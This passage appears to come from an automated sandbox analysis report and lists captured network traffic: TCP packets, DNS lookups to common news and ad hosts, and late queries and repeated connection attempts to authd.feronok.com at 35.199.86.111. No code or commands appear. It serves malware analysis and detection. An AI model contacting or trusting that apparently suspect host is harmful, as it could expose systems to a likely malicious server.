                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.050453901 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.050482035 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.051379919 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.051430941 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.051465034 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.051518917 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052439928 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052489042 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052517891 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052531958 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052536011 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052570105 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052576065 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.052614927 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.053390980 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.053431988 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.053456068 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.053481102 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.054347038 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.054385900 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.054426908 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.054454088 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.055331945 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.055375099 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.055408955 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.055433035 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.056314945 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.056359053 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.056391001 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.056415081 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.057313919 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.057357073 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.057377100 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.057399988 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.058219910 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.058260918 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.058290005 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.058317900 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.059221029 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.059264898 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.059302092 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.059326887 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.060184956 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.060230017 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.060261965 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.060286999 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.061161995 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.061204910 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.061242104 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.061268091 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.062161922 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.062211990 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.062232018 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.062257051 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.063179970 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.063232899 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.063252926 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.063277006 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064100027 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064145088 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064173937 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064183950 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064193010 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064225912 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064229965 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.064273119 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.065047026 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.065093994 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.065121889 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.065145016 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.066026926 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.066061020 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.066088915 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.066107035 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.079338074 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.079499006 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.079607010 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.079890966 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.079925060 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.080050945 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.080257893 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.085144043 CEST44349715151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.090440035 CEST44349716151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.093421936 CEST44349718151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.095402002 CEST44349717151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:55.127084970 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006452084 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006532907 CEST49715443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006630898 CEST49716443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006711960 CEST49717443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006820917 CEST49718443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.006906986 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.009434938 CEST49702443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.009500980 CEST49703443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051795959 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051822901 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051841021 CEST44349715151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051856995 CEST44349714151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051872969 CEST44349715151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051944971 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051989079 CEST49715443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.051995039 CEST49714443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052057028 CEST44349717151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052089930 CEST49715443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052110910 CEST49717443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052114964 CEST44349718151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052138090 CEST44349717151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052155018 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052169085 CEST44349718151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052176952 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052186012 CEST44349718151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052196980 CEST49717443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052197933 CEST44349719151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052236080 CEST49718443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052292109 CEST49718443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052295923 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052314997 CEST49719443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.052956104 CEST44349702104.20.184.68192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.053015947 CEST49702443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.053364038 CEST44349716151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.053380013 CEST44349716151.101.1.44192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.053423882 CEST49716443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.053467989 CEST49716443192.168.2.3151.101.1.44
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.055084944 CEST44349703104.20.184.68192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.058705091 CEST49703443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.820178032 CEST4973580192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.820328951 CEST4973680192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:40.832189083 CEST4973580192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:40.833503008 CEST4973680192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:42.848025084 CEST4973580192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:42.848030090 CEST4973680192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:46.863862991 CEST4973780192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:47.875051975 CEST4973780192.168.2.335.199.86.111
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:49.888026953 CEST4973780192.168.2.335.199.86.111

                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:30.038402081 CEST5223853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:30.079442024 CEST53522388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:34.565093994 CEST4987353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:34.607491970 CEST53498738.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:36.154067993 CEST5319653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:36.202639103 CEST53531968.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:37.077749014 CEST5677753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:37.126135111 CEST53567778.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:39.403690100 CEST5864353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:39.454817057 CEST53586438.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.274612904 CEST6098553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.325078011 CEST53609858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.785207987 CEST5020053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.828094959 CEST53502008.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:45.683727026 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:45.752513885 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:45.762336969 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:45.825138092 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:47.884331942 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:47.951286077 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.432199001 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.481249094 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.824875116 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.885828972 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:49.976773977 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:50.034595966 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:51.370055914 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:51.590363979 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:52.463663101 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:52.515685081 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:53.924783945 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:53.966686964 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.696268082 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:10.559168100 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:10.600667000 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:11.638909101 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:11.689496994 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:12.732590914 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:12.776525974 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:13.186880112 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:13.235542059 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:14.270083904 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:14.311727047 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:14.817281961 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:14.858692884 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:15.322099924 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:15.370898008 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:17.365931034 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:17.403502941 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:17.418730974 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:17.448324919 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:18.924563885 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:18.966053009 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:21.470232964 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:21.512350082 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:27.985825062 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:04:28.036780119 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:14.974329948 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:15.015830040 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:21.862438917 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:21.913853884 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:22.687684059 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:22.730663061 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:24.756767988 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:24.805438995 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:25.946604967 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:25.988105059 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:27.352520943 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:27.401349068 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:28.524971962 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:28.565953016 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:29.658592939 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:29.701657057 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:30.835758924 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:30.878696918 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:32.098942995 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:32.140233040 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.317501068 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:33.359971046 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.447345972 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.799158096 CEST53577628.8.8.8192.168.2.3

                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.785207987 CEST192.168.2.38.8.8.80x9efdStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:47.884331942 CEST192.168.2.38.8.8.80xafa2Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.432199001 CEST192.168.2.38.8.8.80xa0d5Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.824875116 CEST192.168.2.38.8.8.80xf3c3Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:49.976773977 CEST192.168.2.38.8.8.80x759fStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:51.370055914 CEST192.168.2.38.8.8.80xa7baStandard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:52.463663101 CEST192.168.2.38.8.8.80x2f9fStandard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:53.924783945 CEST192.168.2.38.8.8.80x90acStandard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.696268082 CEST192.168.2.38.8.8.80x23b9Standard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.447345972 CEST192.168.2.38.8.8.80xfafaStandard query (0)authd.feronok.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:44.828094959 CEST8.8.8.8192.168.2.30x9efdNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:47.951286077 CEST8.8.8.8192.168.2.30xafa2No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.481249094 CEST8.8.8.8192.168.2.30xa0d5No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.481249094 CEST8.8.8.8192.168.2.30xa0d5No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:48.885828972 CEST8.8.8.8192.168.2.30xf3c3No error (0)contextual.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:50.034595966 CEST8.8.8.8192.168.2.30x759fNo error (0)lg3.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:51.590363979 CEST8.8.8.8192.168.2.30xa7baNo error (0)hblg.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:52.515685081 CEST8.8.8.8192.168.2.30x2f9fNo error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:53.966686964 CEST8.8.8.8192.168.2.30x90acNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:53.966686964 CEST8.8.8.8192.168.2.30x90acNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST8.8.8.8192.168.2.30x23b9No error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST8.8.8.8192.168.2.30x23b9No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST8.8.8.8192.168.2.30x23b9No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST8.8.8.8192.168.2.30x23b9No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:03:54.744904041 CEST8.8.8.8192.168.2.30x23b9No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                            Jun 3, 2021 18:05:39.799158096 CEST8.8.8.8192.168.2.30xfafaNo error (0)authd.feronok.com35.199.86.111A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
